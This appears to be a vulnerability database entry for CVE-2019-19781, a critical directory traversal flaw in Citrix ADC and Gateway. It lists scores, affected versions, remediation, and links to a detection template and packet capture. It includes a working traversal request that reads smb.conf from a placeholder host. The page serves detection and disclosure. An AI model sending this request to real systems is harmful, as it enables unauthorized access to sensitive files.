🔙 목록으로 돌아가기

CVE-2019-19781: Citrix ADC and Gateway - Directory Traversal

TitleCitrix ADC and Gateway - Directory Traversal
Authororganiccrap,geeknik
SeverityCritical
ImpactSuccessful exploitation of this vulnerability can lead to unauthorized access to sensitive information, potential data leakage, and further compromise of the affected system.
RemediationApply the necessary security patches provided by Citrix to fix the directory traversal vulnerability.
CVSS Score9.8
EPSS Score0.94442
CVE IDCVE-2019-19781
CWE IDCWE-22
Tags cve cve2019 lfi kev packetstorm citrix vkev vuln

🔍 Vulnerability Description

Citrix Application Delivery Controller (ADC) and Gateway 10.5, 11.1, 12.0, 12.1, and 13.0 are susceptible to directory traversal vulnerabilities.

🌐 HTTP Request

GET /vpn/../vpns/cfg/smb.conf HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_3; en-ca) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.1 Safari/525.20
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2019/CVE-2019-19781.yaml

🦈 Packet Capture: ⬇️ Download cve-2019-19781.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A